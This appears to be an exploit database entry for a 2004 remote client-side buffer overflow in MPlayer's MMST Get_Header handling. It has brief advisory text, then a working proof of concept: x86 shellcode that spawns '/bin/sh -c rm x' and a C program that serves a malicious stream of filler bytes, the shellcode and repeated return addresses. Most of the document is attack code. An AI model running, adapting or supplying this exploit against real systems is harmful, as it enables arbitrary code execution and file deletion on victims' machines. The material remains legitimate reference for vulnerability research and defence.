Lucene search
Ariel BerkmanEXPLOITPACK:9F50A647AABAAF19D754A8F975E6BFCBHistoryDec 15, 2004 - 12:00 a.m.
MPlayer 0.91.0 - MMST Get_Header Remote Client-Side Buffer Overflow
2004-12-1500:00:00
Ariel Berkman
8
MPlayer 0.91.0 - MMST Get_Header Remote Client-Side Buffer Overflow
// source: https://www.securityfocus.com/bid/11962/info
A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
char payload[] = {
0xeb ,0x47
,0x59
,0x89 ,0xca
,0x83 ,0xc2 ,0x18
,0x89 ,0x11
,0x31 ,0xc0
,0x89 ,0x41 ,0x04
,0x83 ,0xc2 ,0x13
,0x89 ,0x51 ,0x08
,0x83 ,0xc2 ,0x08
,0x89 ,0x51 ,0x0c
,0x83 ,0xc2 ,0x03
,0x89 ,0x51 ,0x10
,0x89 ,0x41 ,0x14
,0x88 ,0x41 ,0x2a
,0x88 ,0x41 ,0x32
,0x88 ,0x41 ,0x35
,0x88 ,0x41 ,0x3a
,0x51
,0x83 ,0xc1 ,0x08
,0x51
,0x83 ,0xc1 ,0x20
,0x83 ,0xc1 ,0x03
,0x51
,0x83 ,0xc0 ,0x3b
,0x50
,0xcd ,0x80
,0x31 ,0xc0
,0x50
,0x40
,0x50
,0xcd ,0x80
,0xe8 ,0xb4 ,0xff ,0xff ,0xff
,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;
#include <stdio.h>
main()
{
char buf[256];
int len;
int s,i;
len=recv(0,buf,256,0);
printf("hello\n");
fflush(stdout);
len=recv(0,buf,256,0);
printf("hello\n");
fflush(stdout);
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
fflush(stdout);
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
for (i=0;i<50000;i++)
putchar('A');
for (i=0;i<sizeof payload;i++)
putchar (payload[i]);
printf("123");
for (i=0;i<20000;i++) // RA all the way....
{
putchar(0x01);
putchar(0x15);
putchar(0xbb);
putchar(0xbf);
}
fflush(stdout);
}